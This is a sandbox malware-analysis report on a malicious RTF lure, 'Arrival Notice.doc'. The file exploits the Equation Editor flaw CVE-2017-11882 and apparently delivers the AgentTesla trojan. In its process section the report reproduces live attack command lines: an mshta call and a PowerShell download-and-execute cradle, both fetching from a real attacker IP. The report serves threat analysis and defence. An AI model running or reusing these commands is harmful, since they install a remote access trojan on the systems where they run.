General Info

File name

Arrival Notice.doc

Full analysis
https://app.any.run/tasks/f03410f8-b6dd-4c59-8ccc-b9ff65f1be9c
Verdict
Malicious activity
Analysis date
10/9/2019, 20:00:40
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

ole-embedded

generated-doc

exploit

CVE-2017-11882

trojan

evasion

rat

agenttesla

Indicators:

MIME:
text/rtf
File info:
Rich Text Format data, version 1, unknown character set
MD5

feeab7c41b73d8f03b3d4d005a8b8bf3

SHA1

cb4da77e47fbb97b9dab5c42fe8ff42bb25953a5

SHA256

1ae650453a47cbf7872860245c7feff1dc7f82e9afc0ae9d431b66ca6f324ade

SSDEEP

768:qxrBqbeW6HHkXzD7p2ogaPPPPPhPPPPPgPPPPP/tpeyevzoR8oVojrc9YU:qqbUtwNpoWPcKU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
180 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Loads dropped or rewritten executable
  • ufec.exe (PID: 3084)
Application was dropped or rewritten from another process
  • ufec.exe (PID: 3084)
Equation Editor starts application (CVE-2017-11882)
  • EQNEDT32.EXE (PID: 1640)
Executable content was dropped or overwritten
  • ufec.exe (PID: 3084)
  • powershell.exe (PID: 2760)
Creates files in the user directory
  • ufec.exe (PID: 3084)
  • powershell.exe (PID: 2760)
Executed via WMI
  • powershell.exe (PID: 2760)
PowerShell script executed
  • powershell.exe (PID: 2760)
Starts MSHTA.EXE for opening HTA or HTMLS files
  • EQNEDT32.EXE (PID: 1640)
Connects to unusual port
  • MsHTa.exe (PID: 2840)
  • powershell.exe (PID: 2760)
Executed via COM
  • EQNEDT32.EXE (PID: 1640)
Application was crashed
  • EQNEDT32.EXE (PID: 1640)
Creates files in the user directory
  • WINWORD.EXE (PID: 2700)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2700)
Reads internet explorer settings
  • MsHTa.exe (PID: 2840)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.rtf
|   Rich Text Format (100%)
EXIF
RTF
Author:
FireSecIT
LastModifiedBy:
FireSecIT
CreateDate:
2019:10:07 21:04:00
ModifyDate:
2019:10:07 21:04:00
RevisionNumber:
1
TotalEditTime:
null
Pages:
1
Words:
null
Characters:
null
CharactersWithSpaces:
null
InternalVersionNumber:
95

Screenshots

Processes

Total processes
42
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

+
start drop and start winword.exe no specs eqnedt32.exe mshta.exe powershell.exe ufec.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2700
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Arrival Notice.doc.rtf"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\sxs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll

PID
1640
CMD
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Design Science, Inc.
Description
Microsoft Equation Editor
Version
00110900
Modules
Image
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msi.dll
c:\program files\common files\microsoft shared\equation\1033\eeintl.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\mshta.exe

PID
2840
CMD
MsHTa http://103.207.38.8:1010/hta &AAAAAAAA C
Path
C:\Windows\system32\MsHTa.exe
Indicators
Parent process
EQNEDT32.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\jscript.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2760
CMD
powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://103.207.38.8:1010/get'));
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\users\public\ufec.exe
c:\windows\system32\netutils.dll

PID
3084
CMD
"C:\Users\Public\ufec.exe"
Path
C:\Users\Public\ufec.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\public\ufec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\version.dll
c:\windows\system32\shfolder.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\nsh847e.tmp\system.dll
c:\users\admin\appdata\local\temp\nsh847e.tmp\bgimage.dll
c:\windows\system32\winmm.dll

Registry activity

Total events
1003
Read events
824
Write events
178
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2700
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6k"
366B22008C0A0000010000000000000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1330184241
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1330184355
2700
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1330184356
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
8C0A0000DEEDF981CB7ED50100000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
:m"
3A6D22008C0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
1o"
316F22008C0A000006000000010000006C000000020000005C0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C006100720072006900760061006C0020006E006F0074006900630065002E0064006F0063002E00720074006600000000000000
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D57ECB8507CF00][O00000000]*C:\Users\admin\Desktop\
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D57ECB850A4000][O00000000]*C:\Users\admin\Desktop\Arrival Notice.doc.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 2
[F00000000][T01D2B42B15FB5780][O00000000]*C:\Users\admin\Desktop\retailangeles.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 3
[F00000000][T01D378FFE1163D80][O00000000]*C:\Users\admin\Desktop\settingsbusinesses.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 4
[F00000000][T01D389843DED4000][O00000000]*C:\Users\admin\Desktop\beautifuloptions.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 5
[F00000000][T01D4A18A80BAC700][O00000000]*C:\Users\admin\Documents\policestatement.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 6
[F00000000][T01D312A924E51200][O00000000]*C:\Users\admin\Documents\propertyfunding.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 7
[F00000000][T01D520F8F88D4880][O00000000]*C:\Users\admin\Documents\michiganall.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 8
[F00000000][T01D39228602D7C80][O00000000]*C:\Users\admin\Documents\kingii.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 9
[F00000000][T01D3A2ACBD084100][O00000000]*C:\Users\admin\Documents\incdoes.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 10
[F00000000][T01D41196D7FB9D00][O00000000]*C:\Users\admin\Documents\quiteabove.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 11
[F00000000][T01D3A00CA9819280][O00000000]*C:\Users\admin\Documents\rolecomplex.rtf
2700
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\1875F7
1875F7
040000008C0A00002D00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C004100720072006900760061006C0020004E006F0074006900630065002E0064006F0063002E00720074006600160000004100720072006900760061006C0020004E006F0074006900630065002E0064006F0063002E007200740066000000000001000000000000000EDBE681CB7ED501F7751800F775180000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2700
